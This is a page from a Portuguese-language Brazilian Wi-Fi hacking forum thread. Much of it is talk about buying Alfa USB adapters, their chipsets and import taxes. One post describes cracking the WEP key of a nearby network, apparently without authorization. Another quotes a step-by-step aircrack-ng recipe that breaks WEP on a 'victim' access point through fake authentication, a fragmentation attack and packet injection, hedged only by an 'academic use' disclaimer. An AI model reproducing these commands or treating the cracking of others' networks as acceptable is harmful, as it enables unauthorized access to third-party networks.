Ethical Hacking :: Wardriving :: Warchalking Discussão sobre conceito, aplicações e implicaçãoes do Warchalking e do Wardriving.
Resposta
Página 5 de 7:  « Primeira 3  4  5  6  7  
Opções do Tópico   Trocar para Modo LinearTrocar para Modo HíbridoTrocar para Modo de Tópicos
danielfs27
Junior
Pontos: 1,959, Nível: 18
Pontos: 1,959, Nível: 18 Pontos: 1,959, Nível: 18 Pontos: 1,959, Nível: 18
Nível Acima: 5%, 191 Pontos necessários
Nível Acima: 5% Nível Acima: 5% Nível Acima: 5%
Ativo: 7%
Ativo: 7% Ativo: 7% Ativo: 7%

danielfs27 is an unknown quantity at this point Posts: 27
Reputação: 0
Posted 01-06-09, 16:52 #41 (permalink)
Um tenho um que é o mesmo chipset do alfa, mesmos drivers. vai com uma anteninha original de 2 e uma de 10dbi...
Estou querendo R$160,00
Click the image to open in full size.
dsouza
Junior
Pontos: 186, Nível: 3
Pontos: 186, Nível: 3 Pontos: 186, Nível: 3 Pontos: 186, Nível: 3
Nível Acima: 72%, 14 Pontos necessários
Nível Acima: 72% Nível Acima: 72% Nível Acima: 72%
Ativo: 0%
Ativo: 0% Ativo: 0% Ativo: 0%

dsouza is on a distinguished road Posts: 2
Aonde comprar Alfa Network de 500mw, Posted 07-06-09, 22:14 #42 (permalink)
Boa tarde rmappita !

Eu vi no forum que voce comprou uma Alfa Network AWUS036H e gostaria de saber aonde voce encontrou ela, porque não acho nenhuma loja brasileira que venda ela.

Achei dois no MercadoLivre, um pedindo R$ 260 e outro R$ 450... meio salgado, sendo que no Amazon.com tem ela por US$ 45 (o que compensa mais do que as do mercadolivre, mesmo contanto com frete, imposto e cotacao do dolar).

Alguma dica alguem ? =)

Abracos !
rmappita
Junior
Pontos: 2,358, Nível: 20
Pontos: 2,358, Nível: 20 Pontos: 2,358, Nível: 20 Pontos: 2,358, Nível: 20
Nível Acima: 4%, 192 Pontos necessários
Nível Acima: 4% Nível Acima: 4% Nível Acima: 4%

rmappita is an unknown quantity at this point Posts: 19
Enviar mensagem via Skype para rmappita
Fala dsouza,, Posted 08-06-09, 11:43 #43 (permalink)
Fala dsouza,

Comprei o Alfa na Loja OIW Telecom .:: OIW Telecom Solutions - Loja Virtual ::., eles eram representantes da Alfa Network aqui no Brasil! Comprei ele dia 01/10/2008 por R$169,83 + R$31,72 de ICMS + R$16,77 (Frete) = R$ 212,00 Um valor caro, ja que nos USA como você comentou é MUITO mais barato, mas pelo menos nunca mais tive problemas de compatibilidade e ele sempre funcionou 100%, alem do sinal ser muito melhor que o USB da DLink que meu amigo tem aqui! Mas como o Dolar esta agora acho que compraria direto dos USA! E o cara pedir R$450,00 é doidera ! hehe O coléga danielfs27 ai em cima esta vendendo um no mesmo formato do Alfa e ele falou que é o mesmo Chipset, se puder manda um e-mail pra ele pra vocês falarem via MSN ou Skype e ver o equipamento com mais detalhes e etc.. Pode valer a pena! Não sei se você viu, mas coloqui fotos do meu Alfa e das minhas antenas no tutorial!

Qualquer coisa da um toque!

Abraço,
Rodrigo

Citação:
Postado Originalmente por dsouza Ver Post
Boa tarde rmappita !

Eu vi no forum que voce comprou uma Alfa Network AWUS036H e gostaria de saber aonde voce encontrou ela, porque não acho nenhuma loja brasileira que venda ela.

Achei dois no MercadoLivre, um pedindo R$ 260 e outro R$ 450... meio salgado, sendo que no Amazon.com tem ela por US$ 45 (o que compensa mais do que as do mercadolivre, mesmo contanto com frete, imposto e cotacao do dolar).

Alguma dica alguem ? =)

Abracos !
Última edição por rmappita; 08-06-09 às 11:48.
Methows
Junior
Pontos: 246, Nível: 4
Pontos: 246, Nível: 4 Pontos: 246, Nível: 4 Pontos: 246, Nível: 4
Nível Acima: 92%, 4 Pontos necessários
Nível Acima: 92% Nível Acima: 92% Nível Acima: 92%

Methows is on a distinguished road Posts: 7
Posted 08-06-09, 14:22 #44 (permalink)
Galera, meu alfa está chegando amanhã.

Gostaria de alertar os amigos que pretendem pegar um alfa, que esse 'clone' amarelo que o usuário acima está vendendo é Chipset 8187B diferente do Alfa que é 8187L.

Existem sites comparando o Alfa com seus 'clones' e a diferença é absurda pois diferentemente do alfa os clones só alcançam 500mw em MODO B. Em MODO G chegam no máximo a 70mw.

Espero ter ajudado!
rmappita
Junior
Pontos: 2,358, Nível: 20
Pontos: 2,358, Nível: 20 Pontos: 2,358, Nível: 20 Pontos: 2,358, Nível: 20
Nível Acima: 4%, 192 Pontos necessários
Nível Acima: 4% Nível Acima: 4% Nível Acima: 4%

rmappita is an unknown quantity at this point Posts: 19
Enviar mensagem via Skype para rmappita
!!, Posted 08-06-09, 15:34 #45 (permalink)
Methows, bom você ter feito esse comentário!
Eu ja não sabia dessa informação sobre os clones, se ainda tiver o link do artigo com as comparações coloca aqui. Se puder coloca o preço da compra total do Alfa que esta vindo dos USA, e se você teve que pagar impostos! Coloquei fotos do equipamento aqui no Tutorial!

Valeu Abraço

Citação:
Postado Originalmente por Methows Ver Post
Galera, meu alfa está chegando amanhã.

Gostaria de alertar os amigos que pretendem pegar um alfa, que esse 'clone' amarelo que o usuário acima está vendendo é Chipset 8187B diferente do Alfa que é 8187L.

Existem sites comparando o Alfa com seus 'clones' e a diferença é absurda pois diferentemente do alfa os clones só alcançam 500mw em MODO B. Em MODO G chegam no máximo a 70mw.

Espero ter ajudado!
Última edição por rmappita; 08-06-09 às 15:42.
Methows
Junior
Pontos: 246, Nível: 4
Pontos: 246, Nível: 4 Pontos: 246, Nível: 4 Pontos: 246, Nível: 4
Nível Acima: 92%, 4 Pontos necessários
Nível Acima: 92% Nível Acima: 92% Nível Acima: 92%

Methows is on a distinguished road Posts: 7
Posted 08-06-09, 17:11 #46 (permalink)
Existem vários comentários sobre isso em foruns, mas eu prefiro postar um review de renome para não criar polêmica. :)

http://www.rokland.com/support/awus036h_gsky.pdf

Esse modelo amarelinho é vendido na DealExtreme, pena que no momento a DealExtreme: Cool Gadgets at the Right Price - Site-Wide Free Shipping (Page 1) está offline, então não tenho como mostrar o link e as especificações onde diz claramente o chipset. Mas posso adiantar que além do chipset muitos usuários reclamam que esse 'amarelinho' tem um problema em relação a antena, pois ela é fixada por encaixe magnetico, bem estranho por sinal rs.

O meu eu estou trazendo do ebay, ainda não chegou, mas já está no RJ, porém não sei se chegará taxado. Como todos sabem a receita taxa por amostragem, então não há como saber quem será taxado. Já tomei taxa em produto abaixo de 40 dolares. Como também já comprei um xbox360 de 246 dolares na caixa lacrada e chegou sem taxa. Que critério neh? rs

Estou aqui para somar galera, grande abraço!
thiagomespb
Junior
Pontos: 876, Nível: 11
Pontos: 876, Nível: 11 Pontos: 876, Nível: 11 Pontos: 876, Nível: 11
Nível Acima: 51%, 74 Pontos necessários
Nível Acima: 51% Nível Acima: 51% Nível Acima: 51%

thiagomespb is on a distinguished road Posts: 9
Posted 10-06-09, 17:00 #47 (permalink)
Citação:
Postado Originalmente por Methows Ver Post
Existem vários comentários sobre isso em foruns, mas eu prefiro postar um review de renome para não criar polêmica. :)

http://www.rokland.com/support/awus036h_gsky.pdf

Esse modelo amarelinho é vendido na DealExtreme, pena que no momento a DealExtreme: Cool Gadgets at the Right Price - Site-Wide Free Shipping (Page 1) está offline, então não tenho como mostrar o link e as especificações onde diz claramente o chipset. Mas posso adiantar que além do chipset muitos usuários reclamam que esse 'amarelinho' tem um problema em relação a antena, pois ela é fixada por encaixe magnetico, bem estranho por sinal rs.

O meu eu estou trazendo do ebay, ainda não chegou, mas já está no RJ, porém não sei se chegará taxado. Como todos sabem a receita taxa por amostragem, então não há como saber quem será taxado. Já tomei taxa em produto abaixo de 40 dolares. Como também já comprei um xbox360 de 246 dolares na caixa lacrada e chegou sem taxa. Que critério neh? rs

Estou aqui para somar galera, grande abraço!
Amigo,

Pode me passar o link onde você comprou esse alfa no ebay ?? vi tambem que tem na amazon.. seria mais adequado ??

Tambem vi que ja tem modelos com 802.11N.. seria mais interessante já comprar ?

Obrigado

Thiago Gomes
marcoliveira
Pleno
Pontos: 974, Nível: 12
Pontos: 974, Nível: 12 Pontos: 974, Nível: 12 Pontos: 974, Nível: 12
Nível Acima: 16%, 126 Pontos necessários
Nível Acima: 16% Nível Acima: 16% Nível Acima: 16%

marcoliveira is on a distinguished road Posts: 32
Enviar mensagem via Windows Live Messenger para marcoliveira
è mole mesmo!!!!!!!!!!!!!, Posted 14-06-09, 11:57 #48 (permalink)
!!!!!!!!!muito bom este post!!!!!!!!!!

E ai galera ? blz. realmente é mole quebrar estas senhas wep, sou novo neste lance de wirelles, nem conhecia direito o Linux, muito menos o back track, demorei dois dias para fazer o live cd. hehehehe, novato né!!!!, eu uso uma placa pci Ralink turbo no meu pc configurada para cliente e uma antena direcional de 25 dbi que eu mesmo instalei para pegar um hotspot de minha região, notei que existem 3 redes wep no scan da placa, porem estas redes aparecem e desaparecem. fiz conforme os ensinamentos do post do colega rmappita, o cd roda perfeitamente com a palca ralink, quando digitei o airodump as redes apareceram perfeitamente, escolhi a que tinha trafego(2 macs mais o meu ), criei o arquivo de pacote, conectei, e começou a disparar pacote a 500 pps, em 2 horas e 50 minutos estava disparando pacotes a 2800 pps e puft a senha estava em minhas mãos ( só não consegui testar a senha ja que o scan da minha placa so acusa 13% de sinal e não conecta? como ? no linux conecta a ponto de conseguir a senha em pouco tempo,no network estumbler o sinal tambem é baixo. tem como acessar a rede pelo linux? digo testar a senha?

vou tentar da forma que o colega mferreira postou, só não sei se chipset é o mesmo mas acredito que se der problema é só digitar o chipset correto da miha placa e continuar os procedimentos, depois posto os resultados. valeu !!!!!!!!!!!!!!!
Macloud
Junior
Pontos: 165, Nível: 3
Pontos: 165, Nível: 3 Pontos: 165, Nível: 3 Pontos: 165, Nível: 3
Nível Acima: 30%, 35 Pontos necessários
Nível Acima: 30% Nível Acima: 30% Nível Acima: 30%

Macloud is on a distinguished road Posts: 4
Posted 29-06-09, 11:26 #49 (permalink)
Citação:
Postado Originalmente por mferreira Ver Post
Olá rmappita, tudo bem?

Tenho esta placa e posso dizer que realmente é muito boa, vou fazer a prova para certificação Backtrack WIFU agora Sexta Feira. Bem este método que citou é legal mas muito lento, vou passar a dica de como quebrar uma WEP em menos de 1 minuto usando esta Alfa de 500mhz, ai vai.

1) Backtrack 3
2) rmmod r8187
3) modprobe r8187
4) airmon-ng start wlan0 (coloque o canal que vc quer monitorar assim a placa vai dar mais prioridade para este canal)
5) airodump-ng -w pacote_wep --channel (canal) --bssid (ssid do ap) wlan0
6) Agora crie uma fake authentication com o AP que vc quer quebrar a senha WEP com o seguinte comando: aireplay-ng -1 0 -e (ssid) -a (bssid) -h (seu mac address) wlan0
7) Agora vem a parte boa, vamos ao ataque número 5 chamado de ataque por fragmentação onde eu nem preciso que tenha algum cliente conectado a este AP :-). aireplay-ng -5 -b (bssid) -h (seu mac address) wlan0
8) Ele vai começar a ler uns pacotes e logo vai pedir pra vc dar um "yes". De o yes e espere ele gerar o arquivo de fragmentação com extensão .xor
9) Vamos a mágica com o comando packetforge-ng -0 -a (bssid) -h (seu mac) -k 255.255.255.255 -l 255.255.255.255 -y "pacote de fragmento.xor" -w "salva com um nome"
10) Agora vamos injetar este pacote gerado pelo packetforge-ng na vítima com o seguinte comando: aireplay-ng -2 -r "salva com um nome" wlan0
11) De um "yes" e vai ver o número de pacotes do AP vítima subir como louco, no meu cliente ele deu 900 pacotes por segundo
12) Quando chegar a mais ou menos 44.000 pacotes (para wep de 128) e 22.000 ou menos (para WEP de 64) execute o comando...
13) aircrack-ng -0 -z -n128 "pacote_wep gerado no passo 5"

Prepare-se pra ver uma quebra de senha muito Rápida :-)

Se funcionar, o elogio vai todo para o pessoal do backtrack (muts) e aircrack-ng (Mister_X)

É isso ai galera, espero que gostem. Mas lembrem-se, use apenas para fins acadêmicos. Não tenho responsabilidade nenhuma sobre isso caso vc use para outros fins. Você foi avisado!!!
Pessoal,

Fiz todo o passo a passo, porem quando chego no item 8 ao invés de criar um arquivo ".xor" ele cria um arquivo ".cap" e quando tento fazer o passo 10 diz que dá erro no MAC ADRESS...

Que posso estar errando?

Obrigado desde já pela ajuda.

Macloud
danielfs27
Junior
Pontos: 1,959, Nível: 18
Pontos: 1,959, Nível: 18 Pontos: 1,959, Nível: 18 Pontos: 1,959, Nível: 18
Nível Acima: 5%, 191 Pontos necessários
Nível Acima: 5% Nível Acima: 5% Nível Acima: 5%

danielfs27 is an unknown quantity at this point Posts: 27
Posted 22-07-09, 10:58 #50 (permalink)
Bom respondendo a indagação do colega que o dispositivo que eu tinha só trabalhava com 500mW em B, bom eu sempre falei para os prováveis compradores que ele trabalharia em B e as vendas foram um sucesso.
Procurei bastante e achei um clone do Alfa, mas agora achei com o chipset RTL8187L.
Favoritos
Tags
alfa, bt3, wep
LinkBacks (?)
LinkBack para esse Tópico: http://www.mundowifi.com.br/forum/thread4507.html
Postado Por Por Tipo Data
Tutoriais Post #1 Refback 13-11-09 21:21
Tutoriais Post #1 Refback 13-11-09 13:01
Dificuldades com o Aircrack-ng - FórumGdH Este tópico Refback 11-11-09 07:57
Tutoriais Post #1 Refback 08-11-09 00:14

Usuários ativos no Tópico: 1 (0 Membros e 1 Visitantes)

(Ver Todos Os Membros que leram este tópico: 674
3n1gm4, acidtechno, adailtonsilva, ademirborges, adevair, adfernando, admergcass, Admilson, Administr, adolfof, AdrianoP2, adriazus, agiovani, aildo, Airton AG, ajmalok, Alex Zro, Alex-SP, alexandre lemes, alexandredunan, alexandreosasco, alexduque, alezixs, alfredopadrao, almirfersilva, alohomora, Aluisio Mourao, Alvarenga, alvim29, Amaro, amferraz, andpantanal, Andre Lima, andredfp, andreribeyro, andresamurai, andrezinho, Andrigo, Apocnen, Apperiapawl, arailton.dias, arghsupremo, arirogerio, aristt, ark_, artmario, ataulfo, augustot2, AVJ, azumijp, b4rr050, baianohacker, baixador, baze, bdsr, bear, belezera, beltecme, benserto, bergeraguiar, Bhior, biggbear, bitimph, blynd, bmique, Bojorque, Briooosa, Brujeria, Bruno Matias, brunoems, brunoheri, bruno_bard, Bruno_pho, bugsoft, bunker94, cabeloludao, cabreujr, cacnew, cadumaz, caebarreto, caio2009, campcor, Camper, canmarco, cantizanijunior, cardim, carlosgn, carloshenique, carlossouza, casetex, cavalcante, CB0T, cboente, ceara, celimar dos santos, cetrangolo, cgb_007, chamon, chronnus, chun, cibernetico, ciroboy, CJM, claudemir1985, cleciodavid, clovisrosa, Clsergio, cody, coelho14, comando_sul, cornellllio, coxxx, cpetrolio, crauadams, crazytng, crismat2001, cristinafs, cubentonet, D1sr1tm14, danielcapua, danielfs27, daniloddv, danilo_balaca, Danilo_Domenicis, dani_joker, dantevillani, darioneto221, Darlisson, datafoz, decosch, Deee_Carlos, deivison90, delta, demawi, Denny, desigon, Destemido, dettogni, dibob, didikovalente, diegodecente, diegodl, diegosimao, digo18sc, Divip, dlage, dleite, dmota, dns_used, Doom, douglasengineer, dougue, drefs, DROOPY.RJ, dsoftnet, dsouza, duduzullu, duran750, Dvinc, dyegoborges, eacsfc, Ebiinf, ed232, EddyAORJ, Edenilson Gonsalo Teles, ederkaefer, Edinho1984, Edmur, edsonafcampos, edtetnor, eduardo.agostinho, eduardocc21, eduardoenygma, educpin, edujc, Edxon, egitos, Elementar, ELISVANIO MENDES FERRAZ, elton404, emafpi, Emano, Emazzu, emersonluys, empretera, enable5, enesimioni, erasmaxboy, eremitah, erivelton.macedo, ermilsonet, erstrey, erutan9, eserodiorj, Esp@nhol, estranhu, etdvga, eu-lindo, eunafita, eurival, Everton-g3, f.trevisan, fabianorl, fabio14maraba, fabiodmf, fabiosmith, fasmaia, FELIPE SILVA, felipeamboni25, felipeferri, ffilfernandes, filipeemmanoel, filipe_avelino16, flasio, Flymcs, fodaum, fonsecacarlos, fradennosp, frajollasert, franca_filho, Francis, franktcj, freeopen, frozendesigner, fullburn, fusistor, fustana, gabriel.b.g, gabrielninho, gaguinho, garibao, gemvane, genis, GeorgeUnisoft, geovannep, gervasio2000, Gianni, Gigatech, gilberto_san, gildodias, Gilmar Santos, GilSoares, Gilson Barbosa, glauber27, glaucomarcal, gleysonpc, gremiao, gtboypt, GTIM25, gu.gust, guavaworm, guitar09, gurco, Guru, Gustavo2390, h4c3rk3, hackserver, Hailton Lima, hainsten, hamelo, haphael, hardnfix, harritech, hayno, he man, heder, herbeth, hercules.360, hermanleao, herminio, HJMS, horeia, hpesao, Hs2L, Hukanso, Ilhabela.COM, imapctus_net, indiosurfista, infodias, iron, Isaias, isfrota, israeljunior, isvael do vale, iz0n, J.Andrade, Jaldes, jblinux, jcma, jcr404, jdsousa, jean_carlo, jedson.san, jefersondias, jeffcaio, jejeda, jeoran, jesielsc, jgrizafis, Jhony_MT, jmarcos_85, Joaolp, Jobei, Johny, jonsouza, Jovaine, jpaulol, jr11.03, jranderson04, jscatena, jsdiasjr, jubalkhan, jucelinocdb, juchicesar, Juniopro, juniorbart2, juniorcistia, juniorvsl, junkyy, jurajr, j_cc_carlos, kaiob, kalocar1, karlipe, kdelboul, kebra, keecy, Keilon, kiddoninjai, Kinotini, kiomoitaro, kleberdf, kleberwilliam, klink, knifeparty, kogus@ihotmail.com, kranga, krsprodutora, kurumin74, labiaum, laionlook, lamp, lany, Le@ndroSalvato, leandro poa, leandrolopes_wifi, lean_dro, ledkiller, legiaoemeunome, leitebruno, Lendel, leonelfeira, leopower, Leos, leosa806, leuroi4, lfsaraceno, lhonay, libenak, liliu2006, linhares1985, LinkSSJ6, lipedf, lmpérius, lobojato, Logan Ghost, lopesdc, lostgamex, Luan01x, lucaedri, lucarige, lucas_ranyel, luccio, lucciottuicci, Luciano Meira, luciei, luckymartins, lucsogo, luistrezzi, Luiz Vaz, luizenigma, luizinho1312, luna info, Luttier, luyge, M2N32-SLI, maceloabreu, Macgaren, Mack, mackbolan, Macloud, Maeta, magaiver1805, magsonlz, Majolema, MAKABEUS, maniaradio, manoperalta, marcelinopsilva, Marcelo_rj, marceng, marcio, Marco Fleck, marcoliveira, marcoshass, marcosoliveira, marcosubatuba, MARCOSWIFI, marcovanbrain, mardex4, marivaldocoelho, marlon72, marollim, marquinhos84, mateusrico, matosão, mauricio.wicher, mauriciobc, mauriciobs, Mauro-SP, maurohigh@hotmail.com, maurojunji, Mazzoni, mcgospel, mcneto, Meiji, mendesloko, menezesba, Methows, mferreira, mfreis, micherlan, microkernell, microwave, Mike ²², miro.com, mnard, mnun3s, Mnunes, morissonbatista, mousefastendfurious, mrbmon, mrls1984, mrramires, msgtoledo, muambalino, muiliam, mundialmix, murilo.alt, natanael, nholipa, nilton_rafael, nivaldinho, Nolsek, NSOFT, o74vio, Odalmar, offline, oliveira12, olives, OutOfSys, ozeasribeiro, pablomcz, paca, Paladius, palmitowifi, parishilton, patrick.braz, Patrique, paul yang, paulforthe, Paulo Alberto, paulokao, paulopc, pcastro, pcesar_rf, Pedra Fogo, pedrinho130, Peixinho, pepa_boy, pepolyno, per0sk, petinhoshow, Petrech, pgoes@mcm.com.br, phenrique102, phlinux, php_, phrf, pjunior82, pmartins, polacocwb, powerpcs, president, Primo, pshisco, pu3dns, punk, py4et, py8elo, qtborg, quaty, quinelato, quinhomvs, RaBbLe-ROuSeR, Rafaaa, rafaelgimenez, rafaelmju, rafaelsc, rafaeltlopes, rafagarcia, rafalinkinboy, RAMÃO EDSON L DA SILVA, Ramon R3, rapharlm, rasiel2009, Raul_Kl, rayneider, rdatainfo, Redinfo, RedLuthor, Regis3d, regispages, Reilyp, renato85995033, renatomo, rhalffire, Ricardo Sales, ricardo.kip, ricardosaeki, richard.semenoff, ricmarks, rjkiller, rjng, rmappita, rmarx, rmg63, rmrenan, rmsprofessor, robemelo, Robert-Polert, robertokelsen, robertosferreira, robson-dasilva, rodlg, rodolfo guedes, rodolfo2009, Rodolfowm, rodrigao2010, rodrigo.magus, rodrigofisico, Roger1379, rogeriosims, Rogerio_rc, rogerneo, rogerregis, romapy, Ronaldofrd, ronaldopaggi, roney_oasis, roselli, Routerm4N, rr.sever, rsalomoni, ruyramonn, Samaritano, samcuco, Sampa, samuelpf, samuka, sandro07, sandrokbca, santanaleal, sb2, scan, schulz, Schwanka, sdalmolin, se7, selezio, sergiofsm, setkeycodes, sgvianna, shinobdarcon, Sidiney, silvantoleal, silviomaraujo, SINCMASTER, Smilin, snague, soaresf2006, sodisso, soiu, solrac22, soluvel, sOxbOy, spectrun, sragds, stetison, suportevzt, Syned, sypreshill, sys0p, szanott1, tayner, tdieguez, tedy, temperani, thaleslaray, thiagoinf, thiagokbl, thiagomespb, thiagoreboukas, Thomaoshi, thosjanas, tiago guerra, timetal, tkranen, tochano, together, Ton, toninho/sp*, tsuji_giri, tubbba_tbsss, tucors, tutistu, Tuxjr, upers, Valdeci Santos, valdo lopes, Vasco, vasconz, vercety, Verowilson, Victor_marinho, vilar, virgulando, vranieri, vrassistencia, w.shark, wallace cortez, wallacebm, WALMER, watahell, watz, Wavila, wbflinux, webjayme, wedson regis, wellingtonmagno, WGT_MASTER, Wi-Net®, willgueto, WillianGama, willianld, willianrcn, wiluxaju, wirelles, WL Master, wlanbr, wolva, workwifi, Wsa2007, xandolho, Xororo, yahfrog, Zap, zeca_urubu, zero, zeus.breno, Zeus10000, zoOLda, _Sem_Nick_, ||The_Godfather||
Opções do Tópico Modos de Exibição
Modo Linear Modo Linear
Regras para Posts